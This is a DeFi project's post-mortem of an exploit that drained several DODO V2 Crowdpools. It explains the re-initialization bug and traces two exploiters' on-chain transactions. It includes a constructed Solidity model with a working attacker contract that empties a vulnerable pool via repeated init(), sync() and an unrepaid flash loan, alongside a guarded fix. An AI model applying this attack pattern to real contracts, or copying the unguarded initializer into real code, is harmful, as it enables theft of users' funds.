First of all, thank you for your patience and support as we investigate and rectify the recent exploit on DODO. We would also like to express our heartfelt gratitude to @samczsun of Paradigm, @tzhen, PeckShield, SlowMist, 1inch Exchange, and the Binance Smart Chain (BSC) team for their expert advice, efforts, and urgency in helping us understand what happened and recover lost funds.
We ask that the owners of the following addresses reach out to the DODO team at firstname.lastname@example.org, via our admin team on Telegram or Discord, or by DM on Twitter (@BreederDodo):
What We Know So Far
The exploits targeted several DODO V2 Crowdpools, namely the WSZO, WCRES, ETHA, and FUSI pools. Funds in all other pools, including all V1 pools and all non-Crowdpool V2 pools, are safe. In total, approximately $3.8 million was drained as a result of these exploits, of which $1.88 million is expected to be returned (see below for more information).
The DODO V2 Crowdpooling smart contract has a bug that allows the init() function to be called multiple times, so a pool that has already been initialized can be re-initialized with different tokens. This lets an exploiter perform an attack with the following steps:
- Exploiter creates a counterfeit token and initializes the smart contract with it by calling the init() function
- Exploiter calls the sync() function, which sets the "reserve" variable (the pool's recorded token balance) to 0
- Exploiter calls init() again to re-initialize, this time with a "real" token (i.e. a token actually held in DODO's pools)
- Exploiter takes a flash loan of all the real tokens in the pool and never repays it: the flash loan check compares the pool's balance after the loan against the stored reserve, which is now 0, so the check passes and the tokens leave the pool
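The four steps above, as an added and deliberately simplified illustration that is not DODO's code: a single-token pool whose init() has no initializer guard, the counterfeit token and attacker contract that drive it through the sequence, and a hardened pool in which init() can only run once. The contract and function names (VulnerablePool, HardenedPool, FakeToken, Attacker, onFlashLoan) and the reduced interfaces are assumptions made for this example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Constructed, simplified model of a single-token pool (not DODO's contract).
interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
}

interface IFlashLoanReceiver {
    function onFlashLoan(uint256 amount) external;
}

// Vulnerable: init() can be called repeatedly, so the configured token and the
// recorded reserve can be driven out of sync with each other.
contract VulnerablePool {
    IERC20 public token;
    uint256 public reserve;

    function init(IERC20 _token) external virtual {
        token = _token; // BUG: no "already initialized" guard
    }

    // Records the pool's balance of whatever token is currently configured.
    function sync() external {
        reserve = token.balanceOf(address(this));
    }

    // Lends `amount`, then checks repayment against the stored reserve rather
    // than against the balance the pool held before the loan.
    function flashLoan(uint256 amount, IFlashLoanReceiver receiver) external {
        require(token.transfer(address(receiver), amount), "TRANSFER_FAILED");
        receiver.onFlashLoan(amount);
        require(token.balanceOf(address(this)) >= reserve, "FLASH_LOAN_NOT_REPAID");
    }
}

// Hardened: a one-shot initializer guard closes the re-initialization path.
contract HardenedPool is VulnerablePool {
    bool private initialized;

    function init(IERC20 _token) external override {
        require(!initialized, "ALREADY_INITIALIZED");
        initialized = true;
        token = _token;
    }
}

// Counterfeit token: reports a zero balance for everyone, so sync() records 0.
contract FakeToken is IERC20 {
    function balanceOf(address) external pure override returns (uint256) { return 0; }
    function transfer(address, uint256) external pure override returns (bool) { return true; }
}

// Attacker contract following the four steps against a pool that was already
// initialized with, and holds, `realToken`.
contract Attacker is IFlashLoanReceiver {
    function attack(VulnerablePool pool, IERC20 realToken) external {
        pool.init(new FakeToken());                               // step 1: counterfeit token
        pool.sync();                                              // step 2: reserve becomes 0
        pool.init(realToken);                                     // step 3: point back at the real token
        pool.flashLoan(realToken.balanceOf(address(pool)), this); // step 4: borrow everything
        require(realToken.transfer(msg.sender, realToken.balanceOf(address(this))), "PAYOUT_FAILED");
    }

    // Keep the borrowed tokens: the pool's check (balance 0 >= reserve 0) still passes.
    function onFlashLoan(uint256) external override {}
}
```

Deploy VulnerablePool, call init() with a real ERC-20, fund the pool, then call Attacker.attack(): the pool's balance ends at 0 and flashLoan() does not revert, because the reserve it checks against was recorded as 0 in step 2. With the pool deployed as HardenedPool instead, attack() reverts at its first init() with ALREADY_INITIALIZED, since the deployer's own initialization already consumed the one-shot guard. A complementary hardening is to have flashLoan() compare the post-loan balance against a snapshot taken immediately before the transfer rather than against a separately stored reserve.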
In summary, two parties were involved in this exploit. We will refer to them as Individual A and Individual B.
Individual B has all the hallmarks of a frontrunning bot, because:
- They deployed their contract at a vanity address with several leading zeros (a common gas-saving trick, since zero bytes in calldata are cheaper)
- They use the CHI gastoken to reduce gas costs
- They set extremely high gas prices; in one instance they configured the transaction to use a gas price of 93,148 gwei
In addition, Individual B’s exploits preceded Individual A’s successful exploits by roughly ten minutes.
Individual A (https://etherscan.io/address/0x368a6558255bccac517da5106647d8182c571b23) has already contacted us through @samczsun and offered to send back the funds removed from DODO pools. Here is a detailed account of Individual A’s actions:
- Individual A interacted with a centralized exchange.
- Individual A withdrew 0.46597 ETH from Binance: https://etherscan.io/tx/0x970b32a8c81dd3fc47fa118621726fc418ec3526c4379470a4000ed7b448360f
- Individual A executed, in quick succession, 7 BUSD withdrawal transactions (see the link for one example), possibly involving the Binance Bridge: https://etherscan.io/tx/0x300de107cbca466abe121112848daaf7f5f0d15625d54773dd0bbbff4e276e93
- Individual A transferred their funds to another wallet address.
- Individual A transferred 67,416 BUSD to 0xa305fab8bda7e1638235b054889b3217441dd645 twice: https://etherscan.io/tx/0x306d08f3d8af85dfdea7a6edb336d7504e8ecc7c609e4b940d188ba68e11cab5 https://etherscan.io/tx/0x56dbf6421c6e6bd779ab0c12fd49e1f7714dd85023aa74abae1940f8d88669cf
- Individual A transferred 59,245.324743 USDT to 0xa305fab8bda7e1638235b054889b3217441dd645 twice: https://etherscan.io/tx/0xbee2f507b2f4b4321927a9762dac757df12fe1ba2d6f85314273b9ea542a5c13 https://cn.etherscan.com/tx/0xaf80cf58c88f0e0f2f44e3902e4c7cd2c17122511fbc6c2d9b2cd43fbc4199b9
- Individual A executed two exploits against DODO smart contracts.
- The first one was against the DODO-USDT test contract, and funds were transferred to 0xa305fab8bda7e1638235b054889b3217441dd645: https://etherscan.io/address/0x328410f276d4fe83fc78fa56ad32d9821a5e5c1c#tokentxns
- The second one was against the WCRES-USDT contract, and funds were transferred to 0x56178a0d5f301baf6cf3e1cd53d9863437345bf9: https://cn.etherscan.com/address/0x910fd17b9bfc42a6eea822912f036ef5a080be8a#tokentxns
- The funds are now in the following two addresses:
Individual B is most likely a bot. The suspected bot smart contract is https://etherscan.io/address/0x00000000e84f2bbdfb129ed6e495c7f879f3e634 and the trigger account address is https://etherscan.io/address/0x3554187576ec863af63eea81d25fbf6d3f3f13fc. Individual B executed 3 exploits against DODO contracts:
- ETHA-USDT: https://etherscan.io/tx/0x0b062361e16a2ea0942cc1b4462b6584208c8c864609ff73aaa640aaa2d92428
- WSZO-USDT: https://etherscan.io/tx/0xff9b3b2cb09d149762fcffc56ef71362bec1ef6a7d68727155c2d68f395ac1e8
- vETH-WETH, with a gas price of 93,148 gwei: https://etherscan.io/tx/0x561f7ccb27b9928df33fa97c2fb99ea3750593e908f9f0f8baf22ec7ca0c5c4a
The funds are currently in the following two addresses:
Trading on the DODO platform is unaffected by the exploits.
Wallet addresses that have given DODO approvals are unaffected by the exploits.
Again, please reach out to the DODO team if you are the owner of the following addresses:
The DODO Team